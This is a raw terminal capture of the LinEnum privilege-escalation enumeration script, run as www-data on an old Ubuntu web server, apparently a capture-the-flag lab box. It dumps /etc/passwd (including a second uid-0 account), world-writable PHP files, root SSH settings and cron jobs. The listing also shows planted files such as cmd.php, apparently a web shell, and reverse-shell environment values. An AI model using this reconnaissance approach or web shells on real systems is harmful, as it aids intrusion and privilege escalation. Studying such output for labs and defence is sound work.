www-data@web:/var/www/blog/images$ ./LinEnum.sh -t

#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
# version 0.98

[-] Debug Info
[+] Thorough tests = Enabled


Scan started at:
Sun Feb 16 09:19:21 EST 2020


### SYSTEM ##############################################
[-] Kernel information:
Linux web 2.6.38-8-server #42-Ubuntu SMP Mon Apr 11 03:49:04 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux


[-] Kernel information (continued):
Linux version 2.6.38-8-server (buildd@allspice) (gcc version 4.5.2 (Ubuntu/Linaro 4.5.2-8ubuntu3) ) #42-Ubuntu SMP Mon Apr 11 03:49:04 UTC 2011


[-] Specific release information:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=11.04
DISTRIB_CODENAME=natty
DISTRIB_DESCRIPTION="Ubuntu 11.04"


[-] Hostname:
web


### USER/GROUP ##########################################
[-] Current user/group info:
uid=33(www-data) gid=33(www-data) groups=33(www-data)


[-] Users that have previously logged onto the system:
Username         Port     From             Latest
root             tty1                      Mon May  9 19:29:03 -0400 2011
mysql            tty1                      Mon May  9 19:29:03 -0400 2011
dan              tty1                      Sat May  7 16:28:27 -0400 2011


[-] Who else is logged on:
 09:19:22 up 38 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT


[-] Group memberships:
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(libuuid) gid=101(libuuid) groups=101(libuuid)
uid=101(syslog) gid=103(syslog) groups=103(syslog)
uid=0(root) gid=0(root) groups=0(root)
uid=103(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=104(landscape) gid=110(landscape) groups=110(landscape)
uid=1000(dan) gid=1000(dan) groups=1000(dan),4(adm),20(dialout),24(cdrom),46(plugdev),111(lpadmin),112(sambashare),113(admin)


[-] It looks like we have some admin users:
uid=1000(dan) gid=1000(dan) groups=1000(dan),4(adm),20(dialout),24(cdrom),46(plugdev),111(lpadmin),112(sambashare),113(admin)


[-] Contents of /etc/passwd:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
mysql:x:0:0:MySQL Server,,,:/root:/bin/bash
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
landscape:x:104:110::/var/lib/landscape:/bin/false
dan:x:1000:1000:Dan Privett,,,:/home/dan:/bin/bash


[-] Super user account(s):
root
mysql


[-] Are permissions on /home directories lax:
total 12K
drwxr-xr-x  3 root root 4.0K May  7  2011 .
drwxr-xr-x 21 root root 4.0K May  7  2011 ..
drwxr-xr-x  3 dan  dan  4.0K May  9  2011 dan


[-] Files not owned by user but writable by group:
-rwxrwxrwx 1 root root 1975 Sep 20  2004 /var/www/blog/login.php
-rwxrwxrwx 1 root root 6 Nov  4  2004 /var/www/blog/themes/modern/id.txt
-rwxrwxrwx 1 root root 25953 Jan 18  2005 /var/www/blog/themes/modern/themes.php
-rwxrwxrwx 1 root root 2164 Nov  4  2004 /var/www/blog/themes/modern/user_style.php
-rwxrwxrwx 1 root root 628 Jan 17  2005 /var/www/blog/themes/modern/colors/warmgrey.txt
-rwxrwxrwx 1 root root 626 Jan 17  2005 /var/www/blog/themes/modern/colors/classic.txt
-rw-rw-rw- 1 root root 628 Jan  2  2005 /var/www/blog/themes/modern/colors/darkgrey.txt
-rw-rw-rw- 1 root root 626 Jan  2  2005 /var/www/blog/themes/modern/colors/neutral.txt
-rwxrwxrwx 1 root root 3423 Nov 29  2004 /var/www/blog/themes/modern/style.css
-rwxrwxrwx 1 root root 751 Nov  4  2004 /var/www/blog/themes/modern/images/box_down.png
-rwxrwxrwx 1 root root 230 Nov  4  2004 /var/www/blog/themes/modern/images/stars/no_star.png
-rwxrwxrwx 1 root root 254 Nov  4  2004 /var/www/blog/themes/modern/images/stars/half_star.png
-rwxrwxrwx 1 root root 227 Nov  4  2004 /var/www/blog/themes/modern/images/stars/full_star.png
-rwxrwxrwx 1 root root 720 Nov  4  2004 /var/www/blog/themes/modern/images/box_left.png
-rwxrwxrwx 1 root root 708 Nov  4  2004 /var/www/blog/themes/modern/images/box_right.png
-rwxrwxrwx 1 root root 711 Nov  4  2004 /var/www/blog/themes/modern/images/box_up.png
-rwxrwxrwx 1 root root 669 Nov  4  2004 /var/www/blog/themes/modern/images/box_add.png
-rwxrwxrwx 1 root root 602 Nov  4  2004 /var/www/blog/themes/modern/images/box_cancel.png
-rwxrwxrwx 1 root root 704 Nov  4  2004 /var/www/blog/themes/modern/images/box_delete.png
-rwxrwxrwx 1 root root 7 Sep 21  2004 /var/www/blog/themes/default/id.txt
-rwxrwxrwx 1 root root 18916 Jan 18  2005 /var/www/blog/themes/default/themes.php
-rwxrwxrwx 1 root root 1013 Sep 21  2004 /var/www/blog/themes/default/user_style.php
-rwxrwxrwx 1 root root 353 Jan 17  2005 /var/www/blog/themes/default/colors/warmgrey.txt
-rw-rw-rw- 1 root root 353 Jan  2  2005 /var/www/blog/themes/default/colors/darkgrey.txt
-rwxrwxrwx 1 root root 351 Jan 17  2005 /var/www/blog/themes/default/colors/default.txt
-rwxrwxrwx 1 root root 2600 Jan 18  2005 /var/www/blog/themes/default/style.css
-rwxrwxrwx 1 root root 230 Sep 21  2004 /var/www/blog/themes/default/images/stars/no_star.png
-rwxrwxrwx 1 root root 254 Sep 21  2004 /var/www/blog/themes/default/images/stars/half_star.png
-rwxrwxrwx 1 root root 227 Sep 21  2004 /var/www/blog/themes/default/images/stars/full_star.png
-rwxrwxrwx 1 root root 2107 Jan 18  2005 /var/www/blog/scripts/sb_functions.php
-rwxrwxrwx 1 root root 811 Sep 20  2004 /var/www/blog/scripts/sb_javascript.js
-rwxrwxrwx 1 root root 10371 Jan 18  2005 /var/www/blog/scripts/sb_comments.php
-rwxrwxrwx 1 root root 4844 Oct 16  2004 /var/www/blog/scripts/sb_fileio.php
-rwxrwxrwx 1 root root 888 Sep 20  2004 /var/www/blog/scripts/sb_log.php
-rwxrwxrwx 1 root root 3705 Sep 20  2004 /var/www/blog/scripts/sb_color.php
-rwxrwxrwx 1 root root 17682 Jan 18  2005 /var/www/blog/scripts/sb_utility.php
-rwxrwxrwx 1 root root 2514 Sep 20  2004 /var/www/blog/scripts/sb_image.php
-rwxrwxrwx 1 root root 4037 Jan 18  2005 /var/www/blog/scripts/sb_login.php
-rwxrwxrwx 1 root root 345 Sep 20  2004 /var/www/blog/scripts/sb_template.php
-rwxrwxrwx 1 root root 4753 Jan  5  2005 /var/www/blog/scripts/sb_communicate.php
-rwxrwxrwx 1 root root 18357 Nov 29  2004 /var/www/blog/scripts/sb_date.php
-rwxrwxrwx 1 root root 13058 Jan  1  2005 /var/www/blog/scripts/sb_feed.php
-rwxrwxrwx 1 root root 6825 Oct 18  2004 /var/www/blog/scripts/sb_static.php
-rw-rw-rw- 1 root root 5646 Jan  2  2005 /var/www/blog/scripts/sb_search.php
-rwxrwxrwx 1 root root 4976 Dec 11  2004 /var/www/blog/scripts/sb_editor.php
-rwxrwxrwx 1 root root 23316 Jan 17  2005 /var/www/blog/scripts/sb_menu.php
-rw-rw-rw- 1 root root 11312 Jan  5  2005 /var/www/blog/scripts/sb_trackback.php
-rwxrwxrwx 1 root root 8943 Dec 28  2004 /var/www/blog/scripts/sb_entry.php
-rwxrwxrwx 1 root root 9902 Nov 30  2004 /var/www/blog/scripts/sb_config.php
-rwxrwxrwx 1 root root 22775 Jan 18  2005 /var/www/blog/scripts/sb_display.php
-rwxrwxrwx 1 root root 18527 Nov 29  2004 /var/www/blog/scripts/sb_formatting.php
-rwxrwxrwx 1 root root 1547 Jan  1  2005 /var/www/blog/scripts/sb_categories.php
-rwxrwxrwx 1 root root 9162 Jan 18  2005 /var/www/blog/scripts/sb_theme.php
-rwxrwxrwx 1 root root 4754 Jan 18  2005 /var/www/blog/index.php
-rwxrwxrwx 1 root root 1201 Sep 20  2004 /var/www/blog/image_list.php
-rw-rw-rw- 1 root root 1745 Nov 24  2004 /var/www/blog/trackback_delete_cgi.php
-rw-rw-rw- 1 root root 4496 Jan  2  2005 /var/www/blog/add_static.php
-rwxrwxrwx 1 root root 400 Nov  8  2004 /var/www/blog/rss.php
-rwxrwxrwx 1 root root 1929 Oct 18  2004 /var/www/blog/upload_img_cgi.php
-rwxrwxrwx 1 root root 3383 Oct 18  2004 /var/www/blog/themes.php
-rwxrwxrwx 1 root root 1560 Jan 18  2005 /var/www/blog/contact_cgi.php
-rwxrwxrwx 1 root root 908 Sep 20  2004 /var/www/blog/recompress.php
-rw-rw-rw- 1 root root 6 May 13  2004 /var/www/blog/languages/danish/id.txt
-rw-rw-rw- 1 root root 29289 Jan 18  2005 /var/www/blog/languages/danish/strings.php
-rw-rw-rw- 1 root root 8 Nov 18  2004 /var/www/blog/languages/japanese/id.txt
-rw-rw-rw- 1 root root 26623 Jan 18  2005 /var/www/blog/languages/japanese/strings.php
-rw-rw-rw- 1 root root 31 Jun 18  2004 /var/www/blog/languages/tamil/id.txt
-rw-rw-rw- 1 root root 46963 Jan 18  2005 /var/www/blog/languages/tamil/strings.php
-rw-rw-rw- 1 root root 8 Jun 23  2004 /var/www/blog/languages/italiano/id.txt
-rw-rw-rw- 1 root root 31590 Jan 18  2005 /var/www/blog/languages/italiano/strings.php
-rw-rw-rw- 1 root root 32 May 13  2004 /var/www/blog/languages/russian_windows-1251/id.txt
-rw-rw-rw- 1 root root 30245 Jan 18  2005 /var/www/blog/languages/russian_windows-1251/strings.php
-rwxrwxrwx 1 root root 16 Jul 28  2004 /var/www/blog/languages/dutch nieuw/id.txt
-rwxrwxrwx 1 root root 30256 Jan 18  2005 /var/www/blog/languages/dutch nieuw/strings.php
-rw-rw-rw- 1 root root 8 Jun  1  2004 /var/www/blog/languages/french/id.txt
-rwxrwxrwx 1 root root 31162 Jan 18  2005 /var/www/blog/languages/french/strings.php
-rwxrwxrwx 1 root root 35 Jul 12  2004 /var/www/blog/languages/zh_chinese/id.txt
-rwxrwxrwx 1 root root 31334 Jan 18  2005 /var/www/blog/languages/zh_chinese/strings.php
-rwxrwxrwx 1 root root 7 Nov  4  2004 /var/www/blog/languages/spanish/id.txt
-rw-rw-rw- 1 root root 31362 Jan 18  2005 /var/www/blog/languages/spanish/strings.php
-rw-rw-rw- 1 root root 35 May 13  2004 /var/www/blog/languages/russian_koi8-ru/id.txt
-rw-rw-rw- 1 root root 30279 Jan 18  2005 /var/www/blog/languages/russian_koi8-ru/strings.php
-rw-rw-rw- 1 root root 5 May 16  2004 /var/www/blog/languages/dutch/id.txt
-rw-rw-rw- 1 root root 30400 Jan 18  2005 /var/www/blog/languages/dutch/strings.php
-rw-rw-rw- 1 root root 5 Jun  7  2004 /var/www/blog/languages/malay/id.txt
-rw-rw-rw- 1 root root 30253 Jan 18  2005 /var/www/blog/languages/malay/strings.php
-rw-rw-rw- 1 root root 9 Jun  9  2004 /var/www/blog/languages/portuguese/id.txt
-rw-rw-rw- 1 root root 29889 Jan 18  2005 /var/www/blog/languages/portuguese/strings.php
-rwxrwxrwx 1 root root 36 Jan  2  2005 /var/www/blog/languages/german01/id.txt
-rwxrwxrwx 1 root root 31114 Jan 18  2005 /var/www/blog/languages/german01/strings.php
-rwxrwxrwx 1 root root 6 Jul  9  2004 /var/www/blog/languages/turkish/id.txt
-rwxrwxrwx 1 root root 30085 Jan 18  2005 /var/www/blog/languages/turkish/strings.php
-rw-rw-rw- 1 root root 7 Jun  1  2004 /var/www/blog/languages/chinese/id.txt
-rw-rw-rw- 1 root root 26722 Jan 18  2005 /var/www/blog/languages/chinese/strings.php
-rwxrwxrwx 1 root root 7 Sep 20  2004 /var/www/blog/languages/english/id.txt
-rwxrwxrwx 1 root root 29207 Jan 18  2005 /var/www/blog/languages/english/strings.php
-rwxrwxrwx 1 root root 5781 Jan 18  2005 /var/www/blog/add_link.php
-rwxrwxrwx 1 root root 2886 Nov 29  2004 /var/www/blog/setup_cgi.php
-rwxrwxrwx 1 root root 12027 Nov 29  2004 /var/www/blog/setup.php
-rwxrwxrwx 1 root root 1616 Oct 18  2004 /var/www/blog/static.php
-rwxrwxrwx 1 root root 2374 Nov 22  2004 /var/www/blog/contact.php
-rwxrwxrwx 1 root root 1764 Jan 18  2005 /var/www/blog/docs/CREDITS.TXT
-rwxrwxrwx 1 root root 875 Jan 18  2005 /var/www/blog/docs/README.TXT
-rwxrwxrwx 1 root root 813 Jan 18  2005 /var/www/blog/docs/UPGRADING.TXT
-rwxrwxrwx 1 root root 1469 Sep 20  2004 /var/www/blog/docs/INSTALL.TXT
-rwxrw-rw- 1 root root 877 Nov 28  2004 /var/www/blog/docs/TRACKBACKS.TXT
-rwxrwxrwx 1 root root 4733 Jan 18  2005 /var/www/blog/docs/TODO.TXT
-rwxrwxrwx 1 root root 4206 Jan 18  2005 /var/www/blog/docs/CHANGELOG.TXT
-rwxrwxrwx 1 root root 281 Sep 22  2004 /var/www/blog/interface/button_rdf10.png
-rwxrwxrwx 1 root root 289 Sep 22  2004 /var/www/blog/interface/button_rss20.png
-rwxrwxrwx 1 root root 275 Sep 22  2004 /var/www/blog/interface/button_atom03.png
-rwxrwxrwx 1 root root 702 Aug 23  2004 /var/www/blog/interface/button_sphpblog.png
-rwxrwxrwx 1 root root 280 Aug 23  2004 /var/www/blog/interface/button_php.png
-rwxrwxrwx 1 root root 2645 Sep 15  2004 /var/www/blog/interface/feed.png
-rwxrwxrwx 1 root root 2645 Aug 23  2004 /var/www/blog/interface/simple_php_blog.png
-rwxrwxrwx 1 root root 43 Sep 20  2004 /var/www/blog/interface/filebrowser/spacer.gif
-rwxrwxrwx 1 root root 88 Sep 20  2004 /var/www/blog/interface/filebrowser/folder_icon.gif
-rwxrwxrwx 1 root root 145 Sep 20  2004 /var/www/blog/interface/filebrowser/file_icon.gif
-rwxrwxrwx 1 root root 365 Aug 23  2004 /var/www/blog/interface/button_txt.png
-rwxrwxrwx 1 root root 1078 Sep 15  2004 /var/www/blog/interface/favicon.ico
-rwxrwxrwx 1 root root 3285 Oct 18  2004 /var/www/blog/delete_static.php
-rwxrwxrwx 1 root root 2720 Jan  4  2005 /var/www/blog/comment_add_cgi.php
-rwxrwxrwx 1 root root 10194 Jan  4  2005 /var/www/blog/comments.php
-rwxrwxrwx 1 root root 4185 Oct 18  2004 /var/www/blog/info.php
-rwxrw-rw- 1 root root 922 Jan 18  2005 /var/www/blog/upgrade.php
-rwxrw-rw- 1 root root 7956 Nov 27  2004 /var/www/blog/trackback.php
-rwxrwxrwx 1 root root 2519 Nov 30  2004 /var/www/blog/colors_cgi.php
-rwxrwxrwx 1 root root 1059 Sep 20  2004 /var/www/blog/logout.php
-rwxrwxrwx 1 root root 2025 Sep 20  2004 /var/www/blog/set_login.php
-rwxrwxrwx 1 root root 7516 Nov 30  2004 /var/www/blog/colors.php
-rwxrwxrwx 1 root root 1348 Sep 20  2004 /var/www/blog/search.php
-rwxrwxrwx 1 root root 2282 Sep 20  2004 /var/www/blog/install00.php
-rwxrwxrwx 1 root root 5984 Dec 27  2004 /var/www/blog/preview_static_cgi.php
-rwxrwxrwx 1 root root 9972 Sep 28  2004 /var/www/blog/upload_img_new.php
-rwxrwxrwx 1 root root 5952 Dec 28  2004 /var/www/blog/add.php
-rwxrw-rw- 1 root root 1001 Nov 28  2004 /var/www/blog/downgrade.php
-rwxrwxrwx 1 root root 10835 Jan  6  2005 /var/www/blog/categories.php
-rw-rw-rw- 1 root root 6904 Jan 18  2005 /var/www/blog/stats.php
-rwxrwxrwx 1 root root 1345 Sep 20  2004 /var/www/blog/set_login_cgi.php
-rwxrwxrwx 1 root root 400 Nov  8  2004 /var/www/blog/rdf.php
-rwxrwxrwx 1 root root 1675 Oct 18  2004 /var/www/blog/add_static_cgi.php
-rwxrwxrwx 1 root root 7789 Dec 28  2004 /var/www/blog/preview_cgi.php
-rwxrwxrwx 1 root root 1685 Jan 18  2005 /var/www/blog/login_cgi.php
-rwxrwxrwx 1 root root 403 Nov  8  2004 /var/www/blog/atom.php
-rw-rw-rw- 1 root root 1489 Jun 17  2004 /var/www/blog/upload_img.php
-rwxrwxrwx 1 root root 2650 Sep 20  2004 /var/www/blog/install02.php
-rwxrwxrwx 1 root root 3039 Oct 18  2004 /var/www/blog/delete.php
-rwxrwxrwx 1 root root 2239 Sep 20  2004 /var/www/blog/install03.php
-rwxrwxrwx 1 root root 2307 Jan  2  2005 /var/www/blog/rate_cgi.php
-rwxrwxrwx 1 root root 6183 Dec 27  2004 /var/www/blog/add_block.php
-rwxrwxrwx 1 root root 1530 Sep 20  2004 /var/www/blog/install01.php
-rwxrw-rw- 1 root root 2780 Jan  1  2005 /var/www/blog/languages.php
-rwxrw-rw- 1 root root 5294 Jan  1  2005 /var/www/blog/languages_cgi.php
-rwxrwxrwx 1 root root 4609 Dec 28  2004 /var/www/blog/add_cgi.php
-rwxrwxrwx 1 root root 1778 Oct 18  2004 /var/www/blog/comment_delete_cgi.php
-rwxrwxrwx 1 root root 2358 Oct 18  2004 /var/www/blog/options_cgi.php
-rw-rw-rw- 1 root root 145408 Nov 30  2004 /var/www/blog/flash/color_picker.fla
-rw-rw-rw- 1 root root 11832 Nov 30  2004 /var/www/blog/flash/color_picker.swf
-rwxrwxrwx 1 root root 22803 Nov 29  2004 /var/www/blog/options.php
-rwxrwxrwx 1 root root 1558 Sep 20  2004 /var/www/blog/install03_cgi.php


[-] Files owned by our user:
-rw-r--r-- 1 www-data www-data 0 Feb 16 09:01 /var/www/blog/config/password.txt
-rw-r--r-- 1 www-data www-data 108 May  9  2011 /var/www/blog/config/config.txt
-rw-r--r-- 1 www-data www-data 172 Feb 16 09:01 /var/www/blog/images/cmd.php
-rw-r--r-- 1 www-data www-data 113 Feb 16 09:01 /var/www/blog/images/reset.php
-rwxr-xr-x 1 www-data www-data 46108 Feb 16 09:18 /var/www/blog/images/LinEnum.sh
-rw-r--r-- 1 www-data www-data 234 May  9  2011 /var/www/blog/content/11/05/entry110509-191340.txt


[-] Hidden files:
-rw-r--r-- 1 root root 102 Jan  5  2011 /etc/cron.hourly/.placeholder
-rw-r--r-- 1 root root 220 Mar 31  2011 /etc/skel/.bash_logout
-rw-r--r-- 1 root root 675 Mar 31  2011 /etc/skel/.profile
-rw-r--r-- 1 root root 3353 Mar 31  2011 /etc/skel/.bashrc
-rw-r--r-- 1 root root 102 Jan  5  2011 /etc/cron.daily/.placeholder
-rw------- 1 root root 0 May  7  2011 /etc/.pwd.lock
-rw-r--r-- 1 root root 102 Jan  5  2011 /etc/cron.d/.placeholder
-rw-r--r-- 1 root root 24 May  7  2011 /etc/init.d/.depend.start
-rw-r--r-- 1 root root 24 May  7  2011 /etc/init.d/.depend.boot
-rw-r--r-- 1 root root 0 May  7  2011 /etc/init.d/.legacy-bootordering
-rw-r--r-- 1 root root 10 May  7  2011 /etc/init.d/.depend.stop
-rw-r--r-- 1 root root 102 Jan  5  2011 /etc/cron.weekly/.placeholder
-rw-r--r-- 1 root root 97 May  7  2011 /etc/apparmor.d/cache/.features
-rw-r--r-- 1 root root 102 Jan  5  2011 /etc/cron.monthly/.placeholder
-rw-r--r-- 1 dan dan 220 May  7  2011 /home/dan/.bash_logout
-rw-r--r-- 1 dan dan 675 May  7  2011 /home/dan/.profile
-rw-r--r-- 1 dan dan 3353 May  7  2011 /home/dan/.bashrc
-rw-r--r-- 1 root root 0 Dec 22 16:56 /dev/.initramfs-tools
-rw-r--r-- 1 root root 104 Apr 11  2011 /usr/src/linux-headers-2.6.38-8-server/scripts/mod/.elfconfig.h.cmd
-rw-r--r-- 1 root root 1520 Apr 11  2011 /usr/src/linux-headers-2.6.38-8-server/scripts/mod/.empty.o.cmd
-rw-r--r-- 1 root root 2451 Apr 11  2011 /usr/src/linux-headers-2.6.38-8-server/scripts/mod/.file2alias.o.cmd
-rw-r--r-- 1 root root 2748 Apr 11  2011 /usr/src/linux-headers-2.6.38-8-server/scripts/mod/.modpost.o.cmd
-rw-r--r-- 1 root root 129 Apr 11  2011 /usr/src/linux-headers-2.6.38-8-server/scripts/mod/.modpost.cmd
-rw-r--r-- 1 root root 1880 Apr 11  2011 /usr/src/linux-headers-2.6.38-8-server/scripts/mod/.mk_elfconfig.cmd
-rw-r--r-- 1 root root 3265 Apr 11  2011 /usr/src/linux-headers-2.6.38-8-server/scripts/mod/.sumversion.o.cmd
-rw-r--r-- 1 root root 2572 Apr 11  2011 /usr/src/linux-headers-2.6.38-8-server/scripts/genksyms/.lex.o.cmd
-rw-r--r-- 1 root root 1697 Apr 11  2011 /usr/src/linux-headers-2.6.38-8-server/scripts/genksyms/.parse.o.cmd
-rw-r--r-- 1 root root 145 Apr 11  2011 /usr/src/linux-headers-2.6.38-8-server/scripts/genksyms/.genksyms.cmd
-rw-r--r-- 1 root root 2031 Apr 11  2011 /usr/src/linux-headers-2.6.38-8-server/scripts/genksyms/.genksyms.o.cmd
-rw-r--r-- 1 root root 1668 Apr 11  2011 /usr/src/linux-headers-2.6.38-8-server/scripts/.kallsyms.cmd
-rw-r--r-- 1 root root 3873 Apr 11  2011 /usr/src/linux-headers-2.6.38-8-server/scripts/kconfig/.zconf.tab.o.cmd
-rw-r--r-- 1 root root 110 Apr 11  2011 /usr/src/linux-headers-2.6.38-8-server/scripts/kconfig/.conf.cmd
-rw-r--r-- 1 root root 2194 Apr 11  2011 /usr/src/linux-headers-2.6.38-8-server/scripts/kconfig/.kxgettext.o.cmd
-rw-r--r-- 1 root root 2536 Apr 11  2011 /usr/src/linux-headers-2.6.38-8-server/scripts/kconfig/.conf.o.cmd
-rw-r--r-- 1 root root 1726 Apr 11  2011 /usr/src/linux-headers-2.6.38-8-server/scripts/.conmakehash.cmd
-rw-r--r-- 1 root root 2141 Apr 11  2011 /usr/src/linux-headers-2.6.38-8-server/scripts/selinux/mdp/.mdp.cmd
-rw-r--r-- 1 root root 2507 Apr 11  2011 /usr/src/linux-headers-2.6.38-8-server/scripts/selinux/genheaders/.genheaders.cmd
-rw-r--r-- 1 root root 3167 Apr 11  2011 /usr/src/linux-headers-2.6.38-8-server/scripts/basic/.fixdep.cmd
-rw-r--r-- 1 root root 2814 Apr 11  2011 /usr/src/linux-headers-2.6.38-8-server/scripts/basic/.docproc.cmd
-rw-r--r-- 1 root root 2366 Apr 11  2011 /usr/src/linux-headers-2.6.38-8-server/scripts/.recordmcount.cmd
-rw-r--r-- 1 root root 130432 Apr 11  2011 /usr/src/linux-headers-2.6.38-8-server/.config.old
-rw-r--r-- 1 root root 563 Apr 11  2011 /usr/src/linux-headers-2.6.38-8-server/.missing-syscalls.d
-rw-r--r-- 1 root root 38405 Apr 11  2011 /usr/src/linux-headers-2.6.38-8-server/arch/x86/kernel/.asm-offsets.s.cmd
-rw-r--r-- 1 root root 4674 Apr 11  2011 /usr/src/linux-headers-2.6.38-8-server/kernel/.bounds.s.cmd
-rw-r--r-- 1 root root 130393 Apr 11  2011 /usr/src/linux-headers-2.6.38-8-server/.config
-rw-r--r-- 1 root root 34 Mar 14  2011 /usr/src/linux-headers-2.6.38-8/scripts/mod/.gitignore
-rw-r--r-- 1 root root 37 Mar 14  2011 /usr/src/linux-headers-2.6.38-8/scripts/genksyms/.gitignore
-rw-r--r-- 1 root root 31 Mar 14  2011 /usr/src/linux-headers-2.6.38-8/scripts/kconfig/lxdialog/.gitignore
-rw-r--r-- 1 root root 178 Mar 14  2011 /usr/src/linux-headers-2.6.38-8/scripts/kconfig/.gitignore
-rw-r--r-- 1 root root 21 Mar 14  2011 /usr/src/linux-headers-2.6.38-8/scripts/selinux/mdp/.gitignore
-rw-r--r-- 1 root root 11 Mar 14  2011 /usr/src/linux-headers-2.6.38-8/scripts/selinux/genheaders/.gitignore
-rw-r--r-- 1 root root 55 Mar 14  2011 /usr/src/linux-headers-2.6.38-8/scripts/dtc/.gitignore
-rw-r--r-- 1 root root 20 Mar 14  2011 /usr/src/linux-headers-2.6.38-8/scripts/basic/.gitignore
-rw-r--r-- 1 root root 88 Mar 14  2011 /usr/src/linux-headers-2.6.38-8/scripts/.gitignore
-rwxr-xr-x 1 root root 1591 Apr 20  2011 /usr/lib/byobu/.notify_osd
-rw-r--r-- 1 root root 29 May  7  2011 /usr/lib/pymodules/python2.7/.path
-rw-r--r-- 1 root root 230 Dec 22  2010 /usr/share/doc/python-simplejson/.buildinfo


[-] World-readable files within /home:
-rw-r--r-- 1 dan dan 220 May  7  2011 /home/dan/.bash_logout
-rw-r--r-- 1 dan dan 675 May  7  2011 /home/dan/.profile
-rw-r--r-- 1 dan dan 3353 May  7  2011 /home/dan/.bashrc


[-] Home directory contents:
total 44K
drwxr-xr-x  4 root root 4.0K May  9  2011 .
drwxr-xr-x 16 root root 4.0K May  7  2011 ..
-rw-r--r--  1 root root 1.4K Mar 24  2008 activate.php
drwxrwxrwx 11 root root 4.0K May  9  2011 blog
drwxr-xr-x  2 root root 4.0K May  7  2011 includes
-rw-r--r--  1 root root  629 May  7  2011 index.php
-rw-r--r--  1 root root   23 Apr  3  2008 info.php
-rw-r--r--  1 root root 3.1K May  7  2011 login.php
-rw-r--r--  1 root root  516 Apr  2  2008 mysqli_connect.php
-rw-r--r--  1 root root 4.6K Apr  2  2008 register.php


[-] Root is allowed to login via SSH:
PermitRootLogin yes


### ENVIRONMENTAL #######################################
[-] Environment information:
APACHE_PID_FILE=/var/run/apache2.pid
APACHE_RUN_USER=www-data
TERM=xterm-256color
SHELL=bash
RPORT=443
PATH=/usr/local/bin:/usr/bin:/bin
APACHE_LOG_DIR=/var/log/apache2
RHOST=10.10.10.134
PWD=/var/www/blog/images
LANG=C
APACHE_RUN_GROUP=www-data
SHLVL=2
APACHE_RUN_DIR=/var/run/apache2
APACHE_LOCK_DIR=/var/lock/apache2
_=/usr/bin/env


[-] Path information:
/usr/local/bin:/usr/bin:/bin


[-] Available shells:
# /etc/shells: valid login shells
/bin/csh
/bin/sh
/usr/bin/es
/usr/bin/ksh
/bin/ksh
/usr/bin/rc
/usr/bin/tcsh
/bin/tcsh
/usr/bin/esh
/bin/dash
/bin/bash
/bin/rbash
/usr/bin/screen


[-] Current umask value:
0022
u=rwx,g=rx,o=rx


[-] umask value as specified in /etc/login.defs:
UMASK		022


[-] Password and storage information:
PASS_MAX_DAYS	99999
PASS_MIN_DAYS	0
PASS_WARN_AGE	7
ENCRYPT_METHOD SHA512


### JOBS/TASKS ##########################################
[-] Cron jobs:
-rw-r--r-- 1 root root  724 Jan  5  2011 /etc/crontab

/etc/cron.d:
total 16
drwxr-xr-x  2 root root 4096 May  7  2011 .
drwxr-xr-x 84 root root 4096 Dec 22 16:56 ..
-rw-r--r--  1 root root  102 Jan  5  2011 .placeholder
-rw-r--r--  1 root root  499 Apr 17  2011 php5

/etc/cron.daily:
total 72
drwxr-xr-x  2 root root  4096 May  7  2011 .
drwxr-xr-x 84 root root  4096 Dec 22 16:56 ..
-rw-r--r--  1 root root   102 Jan  5  2011 .placeholder
-rwxr-xr-x  1 root root   633 Feb 22  2011 apache2
-rwxr-xr-x  1 root root   189 Apr 20  2011 apport
-rwxr-xr-x  1 root root 15255 Apr  7  2011 apt
-rwxr-xr-x  1 root root   314 Nov 18  2010 aptitude
-rwxr-xr-x  1 root root   502 Feb  1  2011 bsdmainutils
-rwxr-xr-x  1 root root   256 Apr 14  2011 dpkg
-rwxr-xr-x  1 root root   341 Mar 12  2011 logrotate
-rwxr-xr-x  1 root root  1335 Feb 22  2011 man-db
-rwxr-xr-x  1 root root   606 Oct 14  2010 mlocate
-rwxr-xr-x  1 root root   249 Feb 20  2011 passwd
-rwxr-xr-x  1 root root  2149 Feb  4  2011 popularity-contest
-rwxr-xr-x  1 root root  3594 Jan  5  2011 standard

/etc/cron.hourly:
total 12
drwxr-xr-x  2 root root 4096 May  7  2011 .
drwxr-xr-x 84 root root 4096 Dec 22 16:56 ..
